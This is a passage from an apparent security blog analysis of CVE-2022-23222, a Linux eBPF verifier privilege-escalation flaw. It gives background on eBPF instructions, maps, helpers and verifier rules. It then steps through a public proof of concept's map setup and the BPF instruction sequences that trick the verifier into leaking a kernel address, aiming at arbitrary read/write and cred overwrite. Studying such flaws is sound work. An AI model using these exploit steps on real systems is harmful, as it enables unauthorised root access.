points to struct bpf_map */</span></span><br><span class="line"> PTR_TO_MAP_VALUE, <span class="comment">/* reg points to map element value */</span></span><br><span class="line"> PTR_TO_MAP_VALUE_OR_NULL, <span class="comment">/* points to map elem value or NULL */</span></span><br><span class="line"> PTR_TO_STACK, <span class="comment">/* reg == frame_pointer + offset */</span></span><br><span class="line"> PTR_TO_PACKET_META, <span class="comment">/* skb->data - meta_len */</span></span><br><span class="line"> PTR_TO_PACKET, <span class="comment">/* reg points to skb->data */</span></span><br><span class="line"> PTR_TO_PACKET_END, <span class="comment">/* skb->data + headlen */</span></span><br><span class="line"> PTR_TO_FLOW_KEYS, <span class="comment">/* reg points to bpf_flow_keys */</span></span><br><span class="line"> PTR_TO_SOCKET, <span class="comment">/* reg points to struct bpf_sock */</span></span><br><span class="line"> PTR_TO_SOCKET_OR_NULL, <span class="comment">/* reg points to struct bpf_sock or NULL */</span></span><br><span class="line"> PTR_TO_SOCK_COMMON, <span class="comment">/* reg points to sock_common */</span></span><br><span class="line"> PTR_TO_SOCK_COMMON_OR_NULL, <span class="comment">/* reg points to sock_common or NULL */</span></span><br><span class="line"> PTR_TO_TCP_SOCK, <span class="comment">/* reg points to struct tcp_sock */</span></span><br><span class="line"> PTR_TO_TCP_SOCK_OR_NULL, <span class="comment">/* reg points to struct tcp_sock or NULL */</span></span><br><span class="line"> PTR_TO_TP_BUFFER, <span class="comment">/* reg points to a writable raw tp's buffer */</span></span><br><span class="line"> PTR_TO_XDP_SOCK, <span class="comment">/* reg points to struct xdp_sock */</span></span><br><span class="line"> <span class="comment">/* PTR_TO_BTF_ID points to a kernel struct that does not need</span></span><br><span class="line"><span class="comment"> * to be null checked by the BPF program. 
This does not imply the</span></span><br><span class="line"><span class="comment"> * pointer is _not_ null and in practice this can easily be a null</span></span><br><span class="line"><span class="comment"> * pointer when reading pointer chains. The assumption is program</span></span><br><span class="line"><span class="comment"> * context will handle null pointer dereference typically via fault</span></span><br><span class="line"><span class="comment"> * handling. The verifier must keep this in mind and can make no</span></span><br><span class="line"><span class="comment"> * assumptions about null or non-null when doing branch analysis.</span></span><br><span class="line"><span class="comment"> * Further, when passed into helpers the helpers can not, without</span></span><br><span class="line"><span class="comment"> * additional context, assume the value is non-null.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> PTR_TO_BTF_ID,</span><br><span class="line"> <span class="comment">/* PTR_TO_BTF_ID_OR_NULL points to a kernel struct that has not</span></span><br><span class="line"><span class="comment"> * been checked for null. 
Used primarily to inform the verifier</span></span><br><span class="line"><span class="comment"> * an explicit null check is required for this struct.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> PTR_TO_BTF_ID_OR_NULL,</span><br><span class="line"> PTR_TO_MEM, <span class="comment">/* reg points to valid memory region */</span></span><br><span class="line"> PTR_TO_MEM_OR_NULL, <span class="comment">/* reg points to valid memory region or NULL */</span></span><br><span class="line"> PTR_TO_RDONLY_BUF, <span class="comment">/* reg points to a readonly buffer */</span></span><br><span class="line"> PTR_TO_RDONLY_BUF_OR_NULL, <span class="comment">/* reg points to a readonly buffer or NULL */</span></span><br><span class="line"> PTR_TO_RDWR_BUF, <span class="comment">/* reg points to a read/write buffer */</span></span><br><span class="line"> PTR_TO_RDWR_BUF_OR_NULL, <span class="comment">/* reg points to a read/write buffer or NULL */</span></span><br><span class="line"> PTR_TO_PERCPU_BTF_ID, <span class="comment">/* reg points to a percpu kernel variable */</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>Comparing the two, the *_OR_NULL types missing from the switch are:</p>
<ul>
<li>PTR_TO_BTF_ID_OR_NULL</li>
<li>PTR_TO_MEM_OR_NULL</li>
<li>PTR_TO_RDONLY_BUF_OR_NULL</li>
<li>PTR_TO_RDWR_BUF_OR_NULL</li>
</ul>
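<h2 id="三、漏洞相关知识"><a href="#三、漏洞相关知识" class="headerlink" title="三、漏洞相关知识"></a>3. Related Concepts</h2><p>eBPF (extended Berkeley Packet Filter) is derived from cBPF (classic Berkeley Packet Filter) and is a technology for running programs in a virtual machine inside the kernel. eBPF requires neither changes to the kernel source nor loading a driver, so it is comparatively non-intrusive and can extend kernel functionality safely and efficiently.</p>
<h3 id="3-1-eBPF指令"><a href="#3-1-eBPF指令" class="headerlink" title="3.1 eBPF指令"></a>3.1 eBPF Instructions</h3><p>eBPF uses a 64-bit, register-based virtual instruction set whose design resembles x86-64. A basic instruction is 8 bytes long and is encoded as follows:</p>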
<table>
<thead>
<tr>
<th align="center">32 bits (MSB)</th>
<th align="center">16 bits</th>
<th align="center">4 bits</th>
<th align="center">4 bits</th>
<th align="center">8 bits (LSB)</th>
</tr>
</thead>
<tbody><tr>
<td align="center">immediate</td>
<td align="center">offset</td>
<td align="center">source register</td>
<td align="center">destination register</td>
<td align="center">opcode</td>
</tr>
</tbody></table>
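<p>A wide instruction, such as the 64-bit immediate load behind BPF_LD_MAP_FD, occupies a second 8-byte slot after the basic instruction, for a total length of 16 bytes; the second slot carries the upper 32 bits of the 64-bit immediate.</p>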
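<p>Pseudo-instructions are mnemonic macros defined in the kernel source (include/linux/filter.h) that wrap real instructions to make them easier to read and remember.</p>
<p>The instructions and pseudo-instructions used in the rest of this article, and what they do, are:</p>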
<table>
<thead>
<tr>
<th align="center">Instruction / pseudo-instruction</th>
<th align="center">Semantics</th>
</tr>
</thead>
<tbody><tr>
<td align="center">BPF_MOV64_REG(DST, SRC)</td>
<td align="center">dst = src</td>
</tr>
<tr>
<td align="center">BPF_MOV64_IMM(DST, IMM)</td>
<td align="center">dst_reg = imm32</td>
</tr>
<tr>
<td align="center">BPF_ST_MEM(SIZE, DST, OFF, IMM)</td>
<td align="center">*(uint *) (dst_reg + off16) = imm32</td>
</tr>
<tr>
<td align="center">BPF_STX_MEM(SIZE, DST, SRC, OFF)</td>
<td align="center">*(uint *) (dst_reg + off16) = src_reg</td>
</tr>
<tr>
<td align="center">BPF_LDX_MEM(SIZE, DST, SRC, OFF)</td>
<td align="center">dst_reg = *(uint *) (src_reg + off16)</td>
</tr>
<tr>
<td align="center">BPF_ALU64_IMM(OP, DST, IMM)</td>
<td align="center">dst_reg = dst_reg ‘op’ imm32</td>
</tr>
<tr>
<td align="center">BPF_JMP_IMM(OP, DST, IMM, OFF)</td>
<td align="center">if (dst_reg ‘op’ imm32) goto pc + off16</td>
</tr>
<tr>
<td align="center">BPF_LD_MAP_FD(DST, MAP_FD)</td>
<td align="center">dst = map_fd (16-byte wide instruction; at load time the kernel replaces the fd with a pointer to the map)</td>
</tr>
<tr>
<td align="center">BPF_EXIT_INSN()</td>
<td align="center">exit (return the value in R0)</td>
</tr>
</tbody></table>
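<h3 id="3-2-eBPF寄存器"><a href="#3-2-eBPF寄存器" class="headerlink" title="3.2 eBPF寄存器"></a>3.2 eBPF Registers</h3><p>eBPF has 11 registers: R10 is the read-only frame pointer, and the remaining 10 are general-purpose registers.</p>
<ul>
<li>R0: holds function return values and the eBPF program's exit value</li>
<li>R1 - R5: pass function arguments; caller-saved</li>
<li>R6 - R9: callee-saved</li>
<li>R10: read-only frame pointer</li>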
</ul>
<h3 id="3-3-eBPF程序类型"><a href="#3-3-eBPF程序类型" class="headerlink" title="3.3 eBPF程序类型"></a>3.3 eBPF Program Types</h3><p>All eBPF program types are defined in the following enum:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> bpf_prog_type {</span><br><span class="line"> BPF_PROG_TYPE_UNSPEC = <span class="number">0</span>,</span><br><span class="line"> BPF_PROG_TYPE_SOCKET_FILTER = <span class="number">1</span>,</span><br><span class="line"> BPF_PROG_TYPE_KPROBE = <span class="number">2</span>,</span><br><span class="line"> BPF_PROG_TYPE_SCHED_CLS = <span class="number">3</span>,</span><br><span class="line"> BPF_PROG_TYPE_SCHED_ACT = <span class="number">4</span>,</span><br><span class="line"> BPF_PROG_TYPE_TRACEPOINT = <span class="number">5</span>,</span><br><span class="line"> BPF_PROG_TYPE_XDP = <span class="number">6</span>,</span><br><span class="line"> BPF_PROG_TYPE_PERF_EVENT = <span class="number">7</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SKB = <span 
class="number">8</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SOCK = <span class="number">9</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_IN = <span class="number">10</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_OUT = <span class="number">11</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_XMIT = <span class="number">12</span>,</span><br><span class="line"> BPF_PROG_TYPE_SOCK_OPS = <span class="number">13</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_SKB = <span class="number">14</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_DEVICE = <span class="number">15</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_MSG = <span class="number">16</span>,</span><br><span class="line"> BPF_PROG_TYPE_RAW_TRACEPOINT = <span class="number">17</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SOCK_ADDR = <span class="number">18</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_SEG6LOCAL = <span class="number">19</span>,</span><br><span class="line"> BPF_PROG_TYPE_LIRC_MODE2 = <span class="number">20</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_REUSEPORT = <span class="number">21</span>,</span><br><span class="line"> BPF_PROG_TYPE_FLOW_DISSECTOR = <span class="number">22</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SYSCTL = <span class="number">23</span>,</span><br><span class="line"> BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE = <span class="number">24</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SOCKOPT = <span class="number">25</span>,</span><br><span class="line"> BPF_PROG_TYPE_TRACING = <span class="number">26</span>,</span><br><span class="line"> BPF_PROG_TYPE_STRUCT_OPS = <span class="number">27</span>,</span><br><span class="line"> BPF_PROG_TYPE_EXT = <span class="number">28</span>,</span><br><span class="line"> BPF_PROG_TYPE_LSM = <span class="number">29</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_LOOKUP = <span 
class="number">30</span>,</span><br><span class="line"> BPF_PROG_TYPE_SYSCALL = <span class="number">31</span>,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
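<p>The only program type used below is BPF_PROG_TYPE_SOCKET_FILTER. A program of this type is attached to a socket with setsockopt (option SO_ATTACH_BPF) and traces or filters that socket's traffic; the sockets it can be attached to include UNIX sockets.</p>
<p>Such a program receives a pointer to struct __sk_buff as its argument and can read the socket's traffic through it by calling the bpf_skb_load_bytes_relative helper.</p>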
<h3 id="3-4-eBPF-map"><a href="#3-4-eBPF-map" class="headerlink" title="3.4 eBPF map"></a>3.4 eBPF map</h3><p>eBPF maps are the medium through which eBPF programs and user space exchange data. The available map types are:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> bpf_map_type {</span><br><span class="line"> BPF_MAP_TYPE_UNSPEC = <span class="number">0</span>,</span><br><span class="line"> BPF_MAP_TYPE_HASH = <span class="number">1</span>,</span><br><span class="line"> BPF_MAP_TYPE_ARRAY = <span class="number">2</span>,</span><br><span class="line"> BPF_MAP_TYPE_PROG_ARRAY = <span class="number">3</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERF_EVENT_ARRAY = <span class="number">4</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERCPU_HASH = <span class="number">5</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERCPU_ARRAY = <span class="number">6</span>,</span><br><span class="line"> BPF_MAP_TYPE_STACK_TRACE = <span class="number">7</span>,</span><br><span class="line"> BPF_MAP_TYPE_CGROUP_ARRAY = <span class="number">8</span>,</span><br><span class="line"> 
BPF_MAP_TYPE_LRU_HASH = <span class="number">9</span>,</span><br><span class="line"> BPF_MAP_TYPE_LRU_PERCPU_HASH = <span class="number">10</span>,</span><br><span class="line"> BPF_MAP_TYPE_LPM_TRIE = <span class="number">11</span>,</span><br><span class="line"> BPF_MAP_TYPE_ARRAY_OF_MAPS = <span class="number">12</span>,</span><br><span class="line"> BPF_MAP_TYPE_HASH_OF_MAPS = <span class="number">13</span>,</span><br><span class="line"> BPF_MAP_TYPE_DEVMAP = <span class="number">14</span>,</span><br><span class="line"> BPF_MAP_TYPE_SOCKMAP = <span class="number">15</span>,</span><br><span class="line"> BPF_MAP_TYPE_CPUMAP = <span class="number">16</span>,</span><br><span class="line"> BPF_MAP_TYPE_XSKMAP = <span class="number">17</span>,</span><br><span class="line"> BPF_MAP_TYPE_SOCKHASH = <span class="number">18</span>,</span><br><span class="line"> BPF_MAP_TYPE_CGROUP_STORAGE = <span class="number">19</span>,</span><br><span class="line"> BPF_MAP_TYPE_REUSEPORT_SOCKARRAY = <span class="number">20</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE = <span class="number">21</span>,</span><br><span class="line"> BPF_MAP_TYPE_QUEUE = <span class="number">22</span>,</span><br><span class="line"> BPF_MAP_TYPE_STACK = <span class="number">23</span>,</span><br><span class="line"> BPF_MAP_TYPE_SK_STORAGE = <span class="number">24</span>,</span><br><span class="line"> BPF_MAP_TYPE_DEVMAP_HASH = <span class="number">25</span>,</span><br><span class="line"> BPF_MAP_TYPE_STRUCT_OPS = <span class="number">26</span>,</span><br><span class="line"> BPF_MAP_TYPE_RINGBUF = <span class="number">27</span>,</span><br><span class="line"> BPF_MAP_TYPE_INODE_STORAGE = <span class="number">28</span>,</span><br><span class="line"> BPF_MAP_TYPE_TASK_STORAGE = <span class="number">29</span>,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
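<p>The map types used below are BPF_MAP_TYPE_ARRAY and BPF_MAP_TYPE_RINGBUF.</p>
<p>As the name suggests, BPF_MAP_TYPE_ARRAY works like an array: keys are 32-bit integer indices, and every value is a memory object of the fixed size (value_size) chosen when the map is created.</p>
<p>BPF_MAP_TYPE_RINGBUF is a ring buffer shared between eBPF programs and user space. A program reserves space in it with bpf_ringbuf_reserve; if the data not yet consumed by user space leaves too little free space, the reservation fails and returns NULL instead of overwriting the old data.</p>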
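<h3 id="3-5-eBPF辅助函数"><a href="#3-5-eBPF辅助函数" class="headerlink" title="3.5 eBPF辅助函数"></a>3.5 eBPF Helper Functions</h3><p>eBPF helpers are functions provided by the kernel that eBPF programs are allowed to call.</p>
<p>The kernel decides which helpers each program type may use; for example, bpf_skb_load_bytes_relative is available only to socket-related eBPF programs.</p>
<p>The prototype of each helper is defined by the kernel. The prototypes of the helpers used below are:</p>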
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">bpf_func_proto</span> <span class="title">bpf_map_lookup_elem_proto</span> = {</span></span><br><span class="line"> .func = bpf_map_lookup_elem,</span><br><span class="line"> .gpl_only = <span class="literal">false</span>,</span><br><span class="line"> .pkt_access = <span class="literal">true</span>,</span><br><span class="line"> .ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL,</span><br><span class="line"> .arg1_type = ARG_CONST_MAP_PTR,</span><br><span class="line"> .arg2_type = ARG_PTR_TO_MAP_KEY,</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">bpf_func_proto</span> <span class="title">bpf_ringbuf_reserve_proto</span> = {</span></span><br><span class="line"> .func = bpf_ringbuf_reserve,</span><br><span class="line"> .ret_type = RET_PTR_TO_ALLOC_MEM_OR_NULL,</span><br><span class="line"> .arg1_type = ARG_CONST_MAP_PTR,</span><br><span class="line"> .arg2_type = ARG_CONST_ALLOC_SIZE_OR_ZERO,</span><br><span class="line"> .arg3_type = ARG_ANYTHING,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>As shown, bpf_map_lookup_elem returns RET_PTR_TO_MAP_VALUE_OR_NULL, and bpf_ringbuf_reserve returns RET_PTR_TO_ALLOC_MEM_OR_NULL.</p>
<p>What each eBPF helper does is documented in the bpf-helpers man page (man bpf-helpers).</p>
<h3 id="3-6-eBPF-verifier"><a href="#3-6-eBPF-verifier" class="headerlink" title="3.6 eBPF verifier"></a>3.6 eBPF verifier</h3><p>Every eBPF program must pass the eBPF verifier before it is loaded into the kernel. Only programs that satisfy its rules are allowed to load, which prevents eBPF programs from damaging the kernel.</p>
<p>The restrictions the eBPF verifier places on eBPF programs include:</p>
<ul>
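<li>A program cannot call arbitrary kernel functions. It may only call the eBPF helper functions that the kernel exposes to its program type.</li>
<li>Unreachable instructions are not allowed, which prevents dead code from being loaded.</li>
<li>Loops are restricted: every loop must terminate within a bounded number of iterations.</li>
<li>The stack size is limited to MAX_BPF_STACK, which is 512 bytes as of kernel 5.10.83.</li>
<li>Program complexity is limited: the number of instructions the verifier processes must not exceed BPF_COMPLEXITY_LIMIT_INSNS, which is 1 million as of kernel 5.10.83.</li>
<li>Memory accesses are restricted. For example, a program may not read uninitialized stack memory or access an eBPF map out of bounds.</li>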
</ul>
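<p>The C sketch below roughly illustrates the stack limit by modelling only its bounds part. An access of size bytes at r10 + off must stay inside [-MAX_BPF_STACK, 0). The function name stack_access_in_bounds is hypothetical. The real verifier also checks alignment, spilled registers and slot initialization, and none of that is modelled here.</p>

```c
#include <assert.h>
#include <stdbool.h>

/* 512 bytes: the MAX_BPF_STACK value quoted above for 5.10.x kernels. */
#define MAX_BPF_STACK 512

/*
 * Hypothetical helper modelling only the bounds part of the verifier's
 * stack rule: an access of `size` bytes at r10 + off is accepted if the
 * whole range [off, off + size) lies inside [-MAX_BPF_STACK, 0).
 */
bool stack_access_in_bounds(int off, int size)
{
    assert(size > 0);
    return off >= -MAX_BPF_STACK && off + size <= 0;
}
```

<p>Both an 8-byte and a 9-byte access starting at r10-16 pass this bounds check. The 1-byte overflow used later in the POC therefore never leaves the stack. Instead, it corrupts a neighbouring slot that the verifier believes is unchanged.</p>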
<h2 id="四、POC分析"><a href="#四、POC分析" class="headerlink" title="四、POC分析"></a>四、POC分析</h2><p>POC 地址为:https://github.com/tr3ee/CVE-2022-23222</p>
<p>漏洞整体利用思路是通过欺骗 eBPF verifier 泄露内核地址,并实现内核任意地址读、写原语,通过任意读原语搜索进程 cred 所在地址,通过任意写原语修改进程 cred 以实现提权。</p>
<h3 id="4-1-前置准备"><a href="#4-1-前置准备" class="headerlink" title="4.1 前置准备"></a>4.1 前置准备</h3><p>创建 2 个 eBPF map ,类型分别为 BPF_MAP_TYPE_ARRAY 及 BPF_MAP_TYPE_RINGBUF。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">ret = bpf_create_map(BPF_MAP_TYPE_ARRAY, <span class="keyword">sizeof</span>(u32), PAGE_SIZE, <span class="number">1</span>);</span><br><span class="line"><span class="keyword">if</span> (ret < <span class="number">0</span>) {</span><br><span class="line">WARNF(<span class="string">"Failed to create comm map: %d (%s)"</span>, ret, strerror(-ret));</span><br><span class="line"><span class="keyword">return</span> ret;</span><br><span class="line">}</span><br><span class="line">ctx->comm_fd = ret;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ((ret = bpf_create_map(BPF_MAP_TYPE_RINGBUF, <span class="number">0</span>, <span class="number">0</span>, PAGE_SIZE)) < <span class="number">0</span>) {</span><br><span class="line">WARNF(<span class="string">"Could not create ringbuf map: %d (%s)"</span>, ret, strerror(-ret));</span><br><span class="line"><span class="keyword">return</span> ret;</span><br><span class="line">}</span><br><span class="line">ctx->ringbuf_fd = ret;</span><br></pre></td></tr></table></figure>
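<p>In the POC, the former is used to:</p>
<ol>
<li>Exchange data with the kernel.</li>
<li>Leak the address of its element.</li>
</ol>
<p>The latter is used to:</p>
<ol>
<li>Exchange data with the kernel.</li>
<li>Obtain a PTR_TO_MEM_OR_NULL pointer through the bpf_ringbuf_reserve helper.</li>
</ol>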
<h3 id="4-2-泄露内核地址"><a href="#4-2-泄露内核地址" class="headerlink" title="4.2 泄露内核地址"></a>4.2 泄露内核地址</h3><p>泄露内核地址的方法为构造特定的 eBFP 程序以利用前述漏洞。</p>
<p>先将 r1 保存到 r9 。r1 在进入 eBPF 程序之前被内核初始化为指向 skb 的指针。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r9 = r1</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_9, BPF_REG_1)</span><br></pre></td></tr></table></figure>
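<p>Look up element 0 of the array map and keep the returned pointer (called the array pointer below) in r0. Debugging shows that the array pointer always has the form 0xFFFF…10.</p>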
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r0 = bpf_lookup_elem(ctx->comm_fd, 0)</span></span><br><span class="line">BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd)</span><br><span class="line">BPF_ST_MEM(BPF_DW, BPF_REG_10, <span class="number">-8</span>, <span class="number">0</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, <span class="number">-4</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_lookup_elem)</span><br></pre></td></tr></table></figure>
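<p>The r0 obtained in the previous step has type PTR_TO_MAP_VALUE_OR_NULL. After the following check, r0 becomes PTR_TO_MAP_VALUE on the path where it is not NULL (the false branch of the if).</p>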
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// if (r0 == NULL) exit(1)</span></span><br><span class="line">BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_0, <span class="number">1</span>)</span><br><span class="line">BPF_EXIT_INSN()</span><br></pre></td></tr></table></figure>
<p>Save the array pointer in r8.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r8 = r0</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_8, BPF_REG_0)</span><br></pre></td></tr></table></figure>
<p>Call bpf_ringbuf_reserve to request PAGE_SIZE bytes of ringbuf memory. It returns a PTR_TO_MEM_OR_NULL pointer, one of the pointer types the vulnerable code fails to filter.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)</span></span><br><span class="line">BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_3, <span class="number">0x00</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_reserve)</span><br></pre></td></tr></table></figure>
<p>Copy r0 to r1. r1 now has type PTR_TO_MEM_OR_NULL and the same id as r0. Note that the verifier maintains an id for each eBPF register to track where a pointer came from.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r1 = r0</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_1, BPF_REG_0)</span><br></pre></td></tr></table></figure>
<p>Then add 1 to r1.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r1 = r1 + 1</span></span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, <span class="number">1</span>)</span><br></pre></td></tr></table></figure>
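<p>As adjust_ptr_min_max_vals shows, in pointer addition and subtraction the destination register inherits the id and type of the pointer register. In the previous step r1 is both the destination and the pointer register, so its id and type stay unchanged.</p>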
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">adjust_ptr_min_max_vals</span><span class="params">(struct bpf_verifier_env *env,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_insn *insn,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *ptr_reg,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *off_reg)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="comment">/* In case of 'scalar += pointer', dst_reg inherits pointer type and id.</span></span><br><span class="line"><span class="comment"> * The id may be overwritten later if we create a new variable offset.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> dst_reg->type = ptr_reg->type;</span><br><span class="line"> dst_reg->id = ptr_reg->id;</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
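<p>Check whether r0 is NULL. In practice r0 can never be non-NULL here. The ringbuf's data area is only PAGE_SIZE bytes, and every record also needs an 8-byte header (BPF_RINGBUF_HDR_SZ), so a PAGE_SIZE reservation always fails. On the path that continues after this check, r0 has type SCALAR_VALUE with value 0. What then happens to the type and value of r1, which shares r0's id?</p>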
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }</span></span><br><span class="line">BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, <span class="number">0</span>, <span class="number">5</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_1, BPF_REG_0)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_2, <span class="number">1</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_discard)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_0, <span class="number">2</span>)</span><br><span class="line">BPF_EXIT_INSN()</span><br></pre></td></tr></table></figure>
<p>check_cond_jmp_op is the verifier function that checks conditional jump instructions. When the condition compares a *_OR_NULL pointer with 0, it calls mark_ptr_or_null_regs to update the register types in each branch.</p>
